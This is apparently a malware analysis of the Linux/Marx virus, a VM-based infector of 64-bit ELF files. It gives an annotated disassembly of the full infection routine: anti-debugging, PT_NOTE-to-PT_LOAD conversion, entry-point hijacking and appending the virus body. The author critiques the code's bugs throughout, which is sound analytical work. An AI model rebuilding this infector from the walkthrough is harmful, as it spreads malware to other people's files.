┌───────────────────────┐ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ │ │ █ █ █ █ █ █ │ │ █ █ █ █ █▀▀▀▀ │ │ █ █ █ █ ▄ │ │ ▄▄▄▄▄ │ │ █ █ │ │ █ █ │ │ █▄▄▄█ │ │ ▄ ▄ │ │ █ █ │ │ █ █ │ │ █▄▄▄█ │ │ ▄▄▄▄▄ │ MARX OF THE BEAST │ █ │ Linux/Marx │ █ │ ~ qkumba └───────────────────█ ──┘ Just what I needed today - a virus implemented as a virtual machine. At least it's short. Linux/Marx is a direct-action infector of 64-bit x86-based ELF files in the current directory, using the PT_LOAD technique. Fasten your seatbelts, we're going to race through the code. WHERE DO YOU WANT TO GO TODAY? The virus is implemented using 20 general registers, one stack register, and 1504 bytes of scratch memory (though it also moves the real stack pointer arbitrarily in order to access more memory). There are 31 defined commands, but only 29 of them actually do anything. These are the commands: 0x01 NOP 0x02 PUSH reg32 0x03 POP reg64 0x04 MOV reg64_1, reg64_2 0x05 XOR reg64_1, reg64_2 0x06 SYSCALL imm8 0x07 NOP 0x08 SUB reg64_1, reg64_2 0x09 ADD reg64_1, reg64_2 0x0a MOV reg64, RIP 0x0b PUSH imm8 0x0c PUSH imm16 0x0d PUSH imm32 0x0e JMP +/- imm16 0x0f MOV reg8, imm8 0x10 MOV reg16, imm16 0x11 MOV reg32, imm32 0x12 CMP reg64_1, reg64_2 / JNE +/- imm16 0x13 CMP reg64_1, reg64_2 / JE +/- imm16 0x14 MOV reg8, [imm48] 0x15 MOV reg8, [reg64] 0x16 MOV reg16, [imm48] 0x17 MOV reg16, [reg64] 0x18 MOV reg32, [imm48] 0x19 MOV reg32, [reg64] 0x1a MOV [imm48], reg8 0x1b MOV [reg64], reg8 0x1c MOV [imm48], reg16 0x1d MOV [reg64], reg16 0x1e MOV [imm48], reg32 0x1f MOV [reg64], reg32 0x20 CMP reg64, 0 / JLE +/- imm16 We see instructions for assigning values to registers, reading and writing almost arbitrary (there are restrictions) memory, in different sizes, stack manipulation, basic arithmetic, (conditional) transfer of control, and calling system APIs... everything that a growing VM needs. Interestingly, the CMP-and-branch combinations are implemented as a single instruction each. The branch instruction does not have its own address. SIZE DOES MATTER What we don't see from the outside are all of the little details and traps. Internally, each instruction is eight bytes long. This format means that there is no way to work directly with 64-bit values, despite the VM registers and memory slots being 64-bit internally. It is the same problem that the ARM architecture has, but it also lacks a global pointer to data (there is access to RIP, which could theoretically allow access to RIP-relative immediates, but the virus is not prepared to deal with them), and no shift instruction, so values beyond 32 bits have to be constructed by writing to memory, either by (constructed) address, or using the stack. That leads us to the biggest issue with the implementation, which is that the memory writes don't zero-extend. It means that a "PUSH imm8" will leave 56 bits unchanged in memory. That might be considered acceptable behaviour since the instruction will adjust the stack pointer by only one byte... until we try to pop the stack. Why? Because a "POP" will pull all eight bytes from the stack, leading to an unbalanced stack and sadness. However, it also means that a "MOV REG32, []" will leave the upper 32 bits unchanged, requiring an explicit "XOR reg, reg" before the "MOV" in order to have a fully-defined register. That leads to code bloat. Given that the most common use of the memory reads and writes is paired with the XOR, the MOV set could be reduced to just reg32-style, which would cut eight instructions. Given how many registers are available, the "imm48" option could be removed, too, cutting another two instructions. The CMP set is interesting, too. If the branch instructions were separated into individual instructions, then there would be a single CMP, and all of the branches could be encoded as a single instruction, by using a sub-byte to specify the type. It would also allow for more types of branches. MAKE MY DAY What does the virtualised virus code look like? Here is a disassembly. 0000 (0a): MOV reg[11], RIP The virus starts by saving the execution address. It is used later when infecting a file. 0008 (0f): MOV dil, 0x00 0010 (0f): MOV sil, 0x00 0018 (0f): MOV dl, 0x01 0020 (0f): MOV r10l, 0x00 These MOV instructions are redundant here because all registers are initialised to zero by the VM interpreter, but it's good programming practice to initialise them explicitly. 0028 (06): SYSCALL 101 ptrace(PTRACE_TRACEME, 0, 1, 0). This is an anti-debugging technique. The virus attempts to trace itself, which will fail if a debugger is attached already. Silvio Cesare published in 1999 a paper on Linux anti-debugging techniques. That paper included the non-zero value for the address parameter. However, it is unknown why he used that value, since none of the parameters are ever read by the kernel in a TRACEME request. 0030 (04): MOV reg[02], RET 0038 (0f): MOV dil, 0x00 0040 (12): CMP reg[02], rdi JNE 0050 0048 (0e): JMP 0060 Save the return value from ptrace() call, compare it with zero (cannot use the "CMP ,0" instruction because the branch type is wrong). If the return value is non-zero, that's an error, and an indication that a debugger is detected. 0050 (0f): MOV dil, 0x7b 0058 (06): SYSCALL 60 If a debugger was detected, then exit the process with error code 123. The host code is not executed. The program just acquired debugger protection unintentionally. 0060 (0f): MOV dil, 0x01 0068 (05): XOR rsi, rsi 0070 (04): MOV rsi, SP This is an example of the "must XOR before MOV" due to the lack of zero-extension. This problem could be solved by changing the implementation to MOVZX-based instructions and always writing all 64 bits. 0078 (0d): PUSH "ACAB" 0080 (0f): MOV dl, 0x04 0088 (06): SYSCALL 1 write(stdout, "BACA", 4). Announce the presence of the virus. Or something. 0090 (05): XOR rdi, rdi 0098 (04): MOV rdi, SP 00a0 (0b): PUSH '.' 00a8 (05): XOR rsi, rsi 00b0 (06): SYSCALL 2 open(".", O_RDONLY). Open the current directory for reading. 00b8 (04): MOV rdi, RET 00c0 (04): MOV rsi, SP 00c8 (05): XOR rdx, rdx 00d0 (10): MOV dx, 0x0400 00d8 (06): SYSCALL 217 getdents64(fd, &dirp, 1024). Fetch directory entries into the scratch space. This call might miss some entries if a few file filenames are very long, because it is called only once. 00e0 (04): MOV reg[07], RET 00e8 (09): ADD SP, reg[03] Oops. Lucky that reg[03] is zero. This looks like a left-over from code that was removed. 00f0 (05): XOR reg[06], reg[06] Initialise byte count within the array of entries. 00f8 (04): MOV reg[02], SP 0100 (05): XOR reg[03], reg[03] 0108 (0f): MOV regb[03], 0x13 0110 (09): ADD reg[02], reg[03] reg[02] now points to dirp.d_name[]. 0118 (04): MOV reg[04], SP 0120 (05): XOR reg[05], reg[05] 0128 (04): MOV reg[05], SP 0130 (0f): MOV regb[03], 0x12 0138 (09): ADD reg[05], reg[03] reg[05] now points to dirp.d_type. 0140 (15): MOV regb[03], [reg[05]] Fetch the file type into low byte of reg[03]. The rest of the register was zeroed earlier. 0148 (0e): JMP 01b0 This is a "while() {}" loop, not a "do {} while()", so jump to the end of the loop to check for the exit condition. 0150 (04): MOV SP, reg[04] This is the entry enumerator. Restore the buffer pointer that might have been altered during infection. 0158 (05): XOR reg[05], reg[05] 0160 (04): MOV reg[05], SP 0168 (05): XOR reg[03], reg[03] 0170 (0f): MOV regb[03], 0x10 0178 (09): ADD reg[05], reg[03] reg[05] now points to dirp.d_reclen. 0180 (05): XOR reg[04], reg[04] 0188 (17): MOV regw[04], [reg[05]] 0190 (09): ADD reg[06], reg[04] Fetch reclen and adjust byte count accordingly. This means that the first entry in the directory is always skipped. It is also technically a bug, since d_off should be used instead of reclen to reach the next entry. 0198 (09): ADD SP, reg[04] 01a0 (12): CMP reg[06], reg[07] JNE 00f8 Adjust the buffer pointer correspondingly, and branch until all bytes read. As noted previously, the use of reclen instead of d_off could result in mismatched offsets and this loop not exiting when expected. 01a8 (0e): JMP 0750 Jump out of bounds. The interpreter will detect this case and exit. Beyond this point there could be stored 64-bit immediates that the code could read, which would avoid the need to construct values. 01b0 (05): XOR reg[08], reg[08] 01b8 (0f): MOV regb[08], 0x08 01c0 (12): CMP reg[03], reg[08] JNE 0150 Branch if d_type is not DT_REG. That is, if the entry does not describe a regular file. 01c8 (04): MOV reg[12], reg[02] 01d0 (04): MOV rdi, reg[02] 01d8 (05): XOR rsi, rsi 01e0 (10): MOV si, 0x0402 01e8 (06): SYSCALL 2 open(d_name, O_RDWR | O_NOCTTY). It is unknown why NOCTTY is specified while opening a regular file. 01f0 (20): CMP RET, 0 JLE 0150 Branch if the file-open request failed. 01f8 (04): MOV reg[02], RET reg[02] now holds the file descriptor. 0200 (04): MOV rdi, reg[02] 0208 (04): MOV rsi, SP 0210 (10): MOV regw[08], 0x1000 0218 (09): ADD rsi, reg[08] Point to far far away. This is a dangerous idea since the stack pointer is crossing a page. The safer alternative would have been to go downwards in memory and probe the memory first. 0220 (06): SYSCALL 5 fstat(fd, &statbuf). 0228 (05): XOR reg[08], reg[08] 0230 (0f): MOV regb[08], 0x30 0238 (09): ADD rsi, reg[08] 0240 (04): MOV reg[09], rsi reg[09] now points to fd.st_size. 0248 (05): XOR rsi, rsi 0250 (05): XOR rdi, rdi 0258 (19): MOV esi, [reg[09]] 0260 (0f): MOV regb[08], 0x06 0268 (04): MOV rdx, reg[08] 0270 (0f): MOV regb[08], 0x01 0278 (04): MOV r10, reg[08] 0280 (04): MOV r8, reg[02] 0288 (05): XOR r9, r9 0290 (06): SYSCALL 9 mmap(0, file size, PROT_WRITE | PROT_EXEC, MAP_SHARED, fd, 0). It is unknown why EXEC permission is requested, given that the map is only ever read and written. 0298 (19): MOV edi, [regd[09]] 02a0 (04): MOV reg[09], rdi reg[09] now holds the file size. This could have been achieved earlier and saved one instruction. 02a8 (04): MOV reg[10], RET reg[10] now holds the returned map pointer. The virus assume that the request always succeeds. 02b0 (05): XOR reg[05], reg[05] 02b8 (19): MOV regd[05], [reg[10]] reg[05] now holds the first four bytes of the file, the contents of EI_MAGIC. 02c0 (11): MOV regd[08], 0x464c457f 02c8 (12): CMP reg[08], reg[05] JNE 0348 Branch if the file is not an ELF. That is, EI_MAGIC does not match "\x7FELF". 02d0 (05): XOR reg[08], reg[08] 02d8 (0f): MOV regb[08], 0x04 02e0 (04): MOV reg[05], reg[10] 02e8 (09): ADD reg[05], reg[08] reg[05] now points to Ehdr.e_ident[EI_CLASS]. 02f0 (05): XOR rdi, rdi 02f8 (15): MOV dil, [reg[05]] Fetch the class into low byte of rdi. 0300 (0f): MOV regb[08], 0x02 0308 (12): CMP reg[08], rdi JNE 0348 Branch if the file is not 64-bit. That is, EI_CLASS is not ELFCLASS64. 0310 (05): XOR reg[08], reg[08] 0318 (0f): MOV regb[08], 0x09 0320 (04): MOV reg[05], reg[10] 0328 (09): ADD reg[05], reg[08] reg[05] now points to Ehdr.e_ident[EI_PAD]. 0330 (19): MOV edi, [reg[05]] rdi now holds the first four bytes of the padding. 0338 (11): MOV regd[08], 0xdeadc0de 0340 (12): CMP reg[08], rdi JNE 0368 Branch if the file is not infected already. That is, EI_PAD does not hold "0xdeadc0de". 0348 (05): XOR reg[08], reg[08] 0350 (04): MOV rdi, reg[02] 0358 (06): SYSCALL 3 close(fd). 0360 (0e): JMP 0128 The file is infected, jump to ... where? It's the wrong target address! It should have been 0150. Bad things are about to happen. 0368 (05): XOR reg[08], reg[08] 0370 (05): XOR reg[05], reg[05] 0378 (0f): MOV regb[08], 0x20 0380 (04): MOV rdi, reg[10] 0388 (09): ADD rdi, reg[08] This is the happy path - the file is not infected. rdi now points to Ehdr.e_phoff. 0390 (19): MOV regd[05], [rdi] reg[05] now holds the PHT offset. Remember this. There will be a quiz later. 0398 (0f): MOV regb[08], 0x16 03a0 (09): ADD rdi, reg[08] rdi now points to Ehdr.e_phentsize. 03a8 (17): MOV si, [rdi] rsi now holds the PHT entry size. 03b0 (0f): MOV regb[08], 0x02 03b8 (09): ADD rdi, reg[08] rdi now points to Ehdr.e_phnum. 03c0 (17): MOV regw[08], [rdi] reg[08] now holds the number of program header entries. 03c8 (09): ADD reg[05], rsi Move to the next program header entry. Yes, the first entry is always skipped. The assumption here is that the entry of interest will never be first. 03d0 (05): XOR rdi, rdi 03d8 (0f): MOV dil, 0x01 03e0 (08): SUB reg[08], rdi 03e8 (04): MOV rdi, reg[10] 03f0 (09): ADD rdi, reg[05] rdi now points to a Elf64_Phdr. 03f8 (05): XOR rdx, rdx 0400 (15): MOV dl, [rdi] rdx now holds the Elf64_Phdr.p_type. 0408 (04): MOV rdi, rdx 0410 (05): XOR rdx, rdx 0418 (0f): MOV dl, 0x04 0420 (13): CMP rdi, rdx JE 0438 Branch if the interesting entry type is found. That is, p_type is PT_NOTE. 0428 (05): XOR rdx, rdx 0430 (12): CMP reg[08], rdx JNE 03c8 Otherwise, branch while entries remain to check. THEN FALL THROUGH ANYWAY. Any file that has no note entry will be have its last program header altered unexpectedly, and an infection marker added. 0438 (04): MOV rdi, reg[10] 0440 (05): XOR rdx, rdx 0448 (0f): MOV dl, 0x09 0450 (09): ADD rdi, rdx rdi now points to Ehdr.e_ident[EI_PAD]. 0458 (11): MOV edx, 0xdeadc0de 0460 (1f): MOV [rdi], edx Mark the file as infected. The virus code expects to succeed in all subsequent operations on the file. If nothing else, this marker serves as an inoculation against infection by the same virus. Of course, since this space is used very commonly by other viruses to store their infection marker, it's possible to end up with "sandwiches" of alternating virus infections. 0468 (04): MOV rdi, reg[10] 0470 (09): ADD rdi, reg[05] rdi now points to the note entry. Keeping track of all of these registers is one of the challenges when working through VM code, especially when registers are reused heavily. 0478 (05): XOR rdx, rdx 0480 (0f): MOV dl, 0x01 0488 (1f): MOV [rdi], edx Convert program header type from PT_NOTE to PT_LOAD, a loadable segment. 0490 (04): MOV rdi, reg[10] 0498 (09): ADD rdi, reg[05] rdi now points to the new loadable segment. Or, really, to exactly where it was already. We're not in a constrained environment. Performance is not a concern. Go ahead, I won't judge. 04a0 (0f): MOV dl, 0x04 04a8 (09): ADD rdi, rdx rdi now points to Elf64_Phdr.p_flags. 04b0 (05): XOR rdx, rdx 04b8 (0f): MOV dl, 0x07 04c0 (1f): MOV [rdi], edx Mark segment executable, readable, and writable. The executable and readable are obvious requirements. It is unknown why the writable flag is used. 04c8 (04): MOV rdi, reg[10] 04d0 (09): ADD rdi, reg[05] rdi now points to the new loadable segment. Could have just subtracted instead. 04d8 (0f): MOV dl, 0x20 04e0 (09): ADD rdi, rdx rdi now points to Elf64_Phdr.p_filesz. 04e8 (19): MOV r10d, [rdi] 04f0 (10): MOV dx, 0x0e8e 04f8 (09): ADD r10, rdx 0500 (1f): MOV [rdi], r10d Increase the size of the segment in the file. 0508 (04): MOV rdi, reg[10] 0510 (09): ADD rdi, reg[05] rdi now points to the new loadable segment. Could have put this value in another register. There are so many. 0518 (05): XOR rdx, rdx 0520 (0f): MOV dl, 0x28 0528 (09): ADD rdi, rdx rdi now points to Elf64_Phdr.p_memsz. 0530 (19): MOV r10d, [rdi] 0538 (10): MOV dx, 0x0e8e 0540 (09): ADD r10, rdx 0548 (1f): MOV [rdi], r10d Increase the length of the segment in memory. There is no check if the increase in size will be overlapped by a later segment. 0550 (05): XOR rdx, rdx 0558 (0f): MOV dl, 0x20 0560 (08): SUB rdi, rdx rdi now points to Elf64_Phdr.p_offset. Hey, subtract! Just in time. It's the last one. 0568 (1f): MOV [rdi], regd[09] Change the program header's offset to the original end-of-file. 0570 (05): XOR r10, r10 0578 (11): MOV r10d, 0x0c000000 0580 (09): ADD r10, reg[09] Construct 0x0c000000 + original file size, as the location in memory for the segment to load. 0588 (04): MOV rdi, reg[10] 0590 (0f): MOV dl, 0x18 0598 (09): ADD rdi, rdx rdi now points to Elf64_Ehdr.e_entry. 05a0 (19): MOV r8d, [rdi] r8 now holds the original entry-point address. 05a8 (1f): MOV [rdi], r10d Set new entry-point to 0x0c000000 + original file size. 05b0 (05): XOR rdx, rdx 05b8 (0f): MOV dl, 0x08 05c0 (08): SUB rdi, rdx 05c8 (09): ADD rdi, reg[05] rdi now points to Elf64_Phdr.p_vaddr. 05d0 (1f): MOV [rdi], r10d Set the program header entry virtual address to 0x0c000000 + original file size. 05d8 (05): XOR r9, r9 05e0 (10): MOV r9w, 0x1040 05e8 (09): ADD SP, r9 Point to even more far far away. Another page-crossing, extra dangerous. 05f0 (04): MOV r9, SP 05f8 (0d): PUSH 0xffffe8e8 call get_RIP 0600 (0d): PUSH 0x932d48ff sub rax 0608 (0b): PUSH 0x01 , 0x193 0610 (0d): PUSH 0x2d480000 sub rax 0618 (02): PUSH r10 , 0x0c000000 + original file size 0620 (0c): PUSH 0x0548 add rax 0628 (02): PUSH r8 original entry-point 0630 (0d): PUSH 0xfff4894c mov rsp, r14 0638 (0b): PUSH 0xe0 jmp rax Construct this code in memory: call get_RIP sub rax, 0x193 sub rax, 0x0c000000 + original file size add rax, original entry-point mov rsp, r14 jmp rax This is how the virus transfers control to the host original entry-point (OEP) on completion. It's easier to perform the individual operations on the real CPU than to try to do the arithmetic in the VM. 0640 (04): MOV rdi, reg[10] 0648 (04): MOV rsi, reg[09] 0650 (05): XOR rdx, rdx 0658 (0f): MOV dl, 0x04 0660 (06): SYSCALL 26 msync(mmap, file size, MS_SYNC). Flush the altered mapped memory back to the disk. Now we have a file that is marked infected, with an altered entry-point, but no virus content. We also have a race-condition with a potential request to run the file before the infection completes. There's an interesting side-effect to the sync operation - the file offset is at the end of the file, so no need to seek there. 0668 (06): SYSCALL 11 munmap(mmap, file size). 0670 (04): MOV rdi, reg[02] 0678 (10): MOV dx, 0x03bc 0680 (04): MOV rsi, reg[11] Here's the one time that we use RIP. 0688 (08): SUB rsi, rdx 0690 (05): XOR rdx, rdx 0698 (10): MOV dx, 0x0e8e 06a0 (06): SYSCALL 1 write(fd, start of virus code, size). 06a8 (06): SYSCALL 3 close(fd). Now we have a file that is marked infected, with an altered entry-point, and actual virus content, but no code to return control to the host. The race continues. 06b0 (04): MOV rdi, reg[12] rdi now points to dirp.d_name[]. 06b8 (05): XOR rsi, rsi 06c0 (0f): MOV sil, 0x02 06c8 (06): SYSCALL 2 open(d_name, O_RDWR). This could have been WRONLY, given what's about to happen. 06d0 (04): MOV rdi, RET 06d8 (05): XOR rsi, rsi 06e0 (10): MOV si, 0x018e 06e8 (09): ADD rsi, reg[09] 06f0 (05): XOR rdx, rdx 06f8 (06): SYSCALL 8 lseek(fd, location of OEP transfer code, SEEK_SET). 0700 (05): XOR rdx, rdx 0708 (0f): MOV dl, 0x1c 0710 (04): MOV rsi, r9 0718 (06): SYSCALL 1 write(fd, OEP transfer code, size of OEP transfer code). 0720 (06): SYSCALL 3 close(fd). Hey, we have a fully-infected file! 0728 (05): XOR r9, r9 0730 (10): MOV r9w, 0x1040 0738 (08): SUB SP, r9 That was unexpected. 0x1040 was the size of the addition, but it misses the OEP transfer code that was pushed onto the stack. It also misses the additional 0x1000 bytes that were added when the file was opened. If this value were used then there would be a progressive stack-leak. Hilarity ensures. 0740 (0e): JMP 0150 Move to the next entry in the directory list. The code at 0150 also restores the stack pointer correctly. 0748 (01): NOP Unused as an instruction, used as bounds checking by the interpreter. CONCLUSION Writing even a simple virus is far from simple. Writing a VM is also far from simple. Combining the two is a recipe for disaster.